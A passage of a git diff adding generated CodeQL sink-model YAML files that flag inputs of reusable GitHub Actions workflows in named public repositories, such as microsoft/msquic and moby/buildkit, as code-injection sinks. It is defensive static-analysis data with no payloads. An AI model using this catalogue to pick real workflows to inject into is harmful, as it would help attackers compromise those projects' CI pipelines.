+ - ["kubescape/kubescape/.github/workflows/a-pr-scanner.yaml", "*", "inputs.UNIT_TESTS_PATH", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml new file mode 100644 index 00000000000..50bbdaf8153 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.next-version", "code-injection", "generated"] + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.release-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml new file mode 100644 index 00000000000..9f30976bbad --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "inputs.VERSION_NAME", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "inputs.REGISTRY", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_test.yaml", "*", "inputs.FULL_MATRIX", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_e2e.yaml", "*", "inputs.matrix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml new file mode 100644 index 00000000000..81a419fec0d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml 
@@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["labring/sealos/.github/workflows/services.yml", "*", "inputs.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/services.yml", "*", "inputs.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "inputs.build_from", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "inputs.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "inputs.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/import-patch-image.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/frontend.yml", "*", "inputs.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/frontend.yml", "*", "inputs.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/controllers.yml", "*", "inputs.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/controllers.yml", "*", "inputs.push_image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml new file mode 100644 index 00000000000..35fd748afbe --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "inputs.context", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml new file mode 100644 index 00000000000..192b1b60843 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "inputs.release_id", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "inputs.filename", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "inputs.tar-file-name", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "inputs.whl-file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml new file mode 100644 index 00000000000..5a397f743a3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml new file mode 100644 index 00000000000..97f40ee7c07 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "inputs.directory", "code-injection", "generated"] + - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "inputs.cargo_make_task", "code-injection", "generated"] + - ["leptos-rs/leptos/.github/workflows/get-changed-examples-matrix.yml", "*", "inputs.example_changed", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml new file mode 100644 index 00000000000..293939322e2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "inputs.push_to_s3", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "inputs.pl_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml new file mode 100644 index 00000000000..c3aa198743d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "inputs.liquibase-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml new file mode 100644 index 00000000000..1ea78b01cd6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["litestar-org/litestar/.github/workflows/test.yml", "*", "inputs.python-version", "code-injection", "generated"] + - ["litestar-org/litestar/.github/workflows/notify-released-issues.yml", "*", "inputs.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml new file mode 100644 index 00000000000..23bd3adc5a4 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.package_name_prefix", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.install", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.llvm_force_enable_stats", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.llvm_enable_assertions", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.build_shared_libs", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.cmake_build_type", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.cmake_cxx_compiler", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.cmake_c_compiler", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml new file mode 100644 index 00000000000..77c7570ec0e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lnbits/lnbits/.github/workflows/make.yml", "*", "inputs.make", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml new file mode 100644 index 00000000000..46cc5092355 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "inputs.PPA_URI", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml new file mode 100644 index 00000000000..78a5584d04b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "inputs.pinned_mailu_version", "code-injection", "generated"] + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "inputs.mailu_version", "code-injection", "generated"] + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "inputs.docker_org", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml new file mode 100644 index 00000000000..1c3e5b565be --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "inputs.build_type", "code-injection", "generated"] + - ["mamba-org/mamba/.github/workflows/unix_impl.yml", "*", "inputs.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml new file mode 100644 index 00000000000..7e8d8061fc5 --- /dev/null 
+++ b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "inputs.CTEST_END", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "inputs.CTEST_START", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "inputs.xml_command", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "inputs.artifact_name", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.cmake_command", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.artifact_name", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.CTEST_CONFIGURATION_TYPE", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.DISTR", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml new file mode 100644 index 00000000000..21e3fdb8874 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "inputs.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml new file mode 100644 index 00000000000..67e49a5716c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.mdix-mahapps-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.mdix-colors-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.mdix-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.build-configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml new file mode 100644 index 00000000000..2f30003359c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "inputs.compilers", "code-injection", "generated"] + - ["matter-labs/zksync-era/.github/workflows/build-prover-template.yml", "*", "inputs.image_tag_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml new file mode 100644 index 00000000000..ed9091f37ae --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "inputs.nightly", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml new file mode 100644 index 00000000000..d940c6a98b0 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "inputs.name", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "inputs.drivername", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "inputs.datasource", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/mmctl-test-template.yml", "*", "inputs.datasource", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/esrupgrade-common.yml", "*", "inputs.db-dump-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml new file mode 100644 index 00000000000..57b56667fbe --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml new file mode 100644 index 00000000000..4ffee539cd4 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml 
@@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.adapter_version", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.sm_version", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.expected_resources_namespaces", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.expected_resources_types", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.expected_resources", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.adapter_name", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.patternfile_name", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.service_url", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.deployment_url", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.provider", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adapters.yaml", "*", "inputs.adapter_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml new file mode 100644 index 00000000000..bfe525b2c0e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "inputs.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_nrf52.yml", "*", "inputs.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32_s3.yml", "*", "inputs.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32_c3.yml", "*", "inputs.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32.yml", "*", "inputs.board", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml new file mode 100644 index 00000000000..647bd0ae193 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microcks/microcks/.github/workflows/package-native.yml", "*", "inputs.image-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml new file mode 100644 index 00000000000..b09fcb7f102 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "inputs.success", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml new file mode 100644 index 00000000000..f83101f511c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "inputs.BACKEND_HOST", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "inputs.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "inputs.ARTIFACT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-memorypipeline.yml", "*", "inputs.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "inputs.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "inputs.ARTIFACT_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml new file mode 100644 index 00000000000..7a60c93516d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml 
@@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "inputs.tls", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "inputs.config", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.sanitize", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.plat", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.static", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.tls", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.config", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.sanitize", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.codecheck", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.systemcrypto", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.plat", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml new file mode 100644 index 00000000000..14d7e741dac --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "inputs.platformName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml new file mode 100644 index 00000000000..bb0e3a6a2b6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "inputs.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml new file mode 100644 index 00000000000..aa8f4e6b518 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.extraRunWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.platform", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.extraInitWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.reactNativeWindowsVersion", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.sampleName", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "inputs.extraRunWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "inputs.platform", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "inputs.sampleName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml new file mode 100644 index 00000000000..c9af1a40ddc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "inputs.yarn-args", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml new file mode 100644 index 00000000000..863bc645d98 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.env", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.includes", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.tags", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.kinds", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.pkgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml new file mode 100644 index 00000000000..6e898a4e452 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["moby/moby/.github/workflows/.windows.yml", "*", "inputs.storage", "code-injection", "generated"] + - ["moby/moby/.github/workflows/.windows.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml new file mode 100644 index 00000000000..a08a96a897e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml 
